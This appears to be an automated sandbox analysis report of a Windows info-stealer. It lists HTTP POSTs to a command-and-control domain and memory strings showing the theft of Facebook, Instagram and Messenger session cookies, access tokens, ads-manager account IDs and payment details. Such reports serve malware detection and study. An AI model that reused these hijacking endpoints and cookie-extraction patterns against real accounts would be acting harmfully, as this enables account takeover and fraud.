Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyzData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyzData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyzData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyData Raw: Data Ascii:

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00454060 WaitForSingleObject,HttpOpenRequestW,HttpSendRequestW,HttpQueryInfoW,InternetReadFile,_memmove,InternetCloseHandle,InternetCloseHandle,

0_2_00454060

Source: global traffic	HTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: /

Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe	String found in binary or memory: _time":"13245950599128816","lastpingday":"13245947458518717","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@@@@https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: /Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: /Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe	String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: 84cfba021a5a6662.xyz

Source: unknown

HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz

Source: 6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/
Source: 6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/#y
Source: 6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/ddd
Source: 6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/g
Source: 6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: 1611970727133.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1611970727133.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1611970727133.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: N1yprTBBXs.exe	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 6272167835D47591.exe	String found in binary or memory: http://docs.google.com/
Source: 6272167835D47591.exe	String found in binary or memory: http://drive.google.com/
Source: 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: http://drive.google.com/#y
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijc4NDFiMmZlNWMxZGU2M2JkNDdjMGQzZWI3NjIzYjlkNWU5N
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuG4N?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuQtg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
